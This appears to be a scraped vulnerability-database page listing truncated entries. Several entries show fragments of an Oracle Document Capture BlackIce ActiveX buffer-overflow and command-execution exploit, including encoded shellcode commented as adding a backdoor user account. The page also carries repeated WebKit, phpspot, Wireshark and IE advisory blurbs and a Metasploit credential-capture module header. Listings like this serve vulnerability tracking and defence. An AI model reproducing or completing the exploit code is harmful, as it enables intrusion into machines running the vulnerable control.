Oracle Document Capture BlackIce DEVMODE exploit

Exploit for unknown platform in category remote exploits ================================================ Oracle Document Capture BlackIce DEVMODE exploit ================================================ Title: Oracle Document Capture BlackIce DEVMODE exploit CVE-ID: OSVDB-ID: Author: Pyrokinesis...

Oracle - Document Capture BlackIce DEVMODE

Oracle - Document Capture BlackIce DEVMODE var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +...

Oracle Document Capture BlackIce DEVMODE exploit

No description provided by source. !-- Oracle Document Capture BlackIce DEVMODE ActiveX Control remote stack based buffer overflow IE8 /xp sp3 by Nine:Situations:Group::pyrokinesis CLSID: 1503569A-0AE2-4333-B6E6-466AB0BC73E5 Progid: BLACKICEDEVMODE.BlackIceDEVMODECtrl.1 Binary Path:...

Oracle Document Capture BlackIce Command Execution

var BlackIce = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; pBlackIceDEVMODE = BlackIce.LoadBlackIceDEVMODE "Oracle Document Capture"; BlackIce.EnableKeepExistingFiles pBlackIceDEVMODE; BlackIce.EnableStartApplication pBlackIceDEVMODE; BlackIce.EnableStartBeforePrintpBlackIceDEVMODE;...

Oracle Document Capture BlackIce Stack Buffer Overflow

var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...

CVE-2009-3284

CVE-2009-3284 is a directory traversal vulnerability affecting multiple phpspot products: PHP BBS, PHP Image Capture BBS, PHP & CSS BBS, PHP BBS CE, PHP_RSS_Builder, and webshot. A remote attacker could read server files via unspecified vectors and cause potential data disclosure. Public referenc...

JVN#53591199 Cross-site scripting vulnerability in multiple phpspot products

Multiple products BBS Software etc. provided by phpspot contain a cross-site scripting vulnerablility. Impact An arbitrary script may be executed on the user's web browser. Solution Update the software Update to latest version according to the information provided by developer. Products Affected...

Authentication Capture: HTTP

This module provides a fake HTTP service that is designed to capture authentication credentials. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Authentication Capture: HTTP', 'Description' = %...

Wireshark: Multiple vulnerabilities

Background Wireshark is a versatile network protocol analyzer. Description Multiple vulnerabilities have been discovered in Wireshark: David Maciejak discovered a vulnerability in packet-usb.c in the USB dissector via a malformed USB Request Block URB CVE-2008-4680. Florent Drouin and David...

CVE-2009-1694

WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle redirects, which allows remote attackers to read images from arbitrary web sites via vectors involving a CANVAS element and redirection, related to a "cross-site...

Cross site scripting

WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to read images from arbitrary web sites via a CANVAS element with an SVG image, related to a "cross-site image capture issue."...

CVE-2009-1693

WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to read images from arbitrary web sites via a CANVAS element with an SVG image, related to a "cross-site image capture issue."...

CVE-2009-1693

WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to read images from arbitrary web sites via a CANVAS element with an SVG image, related to a "cross-site image capture issue."...

CVE-2009-1694

WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle redirects, which allows remote attackers to read images from arbitrary web sites via vectors involving a CANVAS element and redirection, related to a "cross-site...

CVE-2009-1693

WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to read images from arbitrary web sites via a CANVAS element with an SVG image, related to a "cross-site image capture issue."...

CVE-2009-1693

CVE-2009-1693 refers to a WebKit vulnerability in Apple Safari prior to 4.0 (and WebKit in affected OS versions) where a CANVAS element containing an SVG image could allow a remote attacker to read images from arbitrary websites, a cross-site image capture issue. The Debian advisory DSA-1950-1 en...

CVE-2009-1694

WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle redirects, which allows remote attackers to read images from arbitrary web sites via vectors involving a CANVAS element and redirection, related to a "cross-site...

CVE-2009-1693

Removed by vendor...

CVE-2009-1694

Removed by vendor...

PT-2009-4026 · Microsoft · Internet Explorer 7 +1

Name of the Vulnerable Software and Affected Versions: Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 Microsoft Internet Explorer 7 for Server 2003 SP2 Microsoft Internet Explorer 7 for Vista Gold, SP1, and SP2 Microsoft Internet Explorer 7 for Server 2008 SP2 Description: The issue...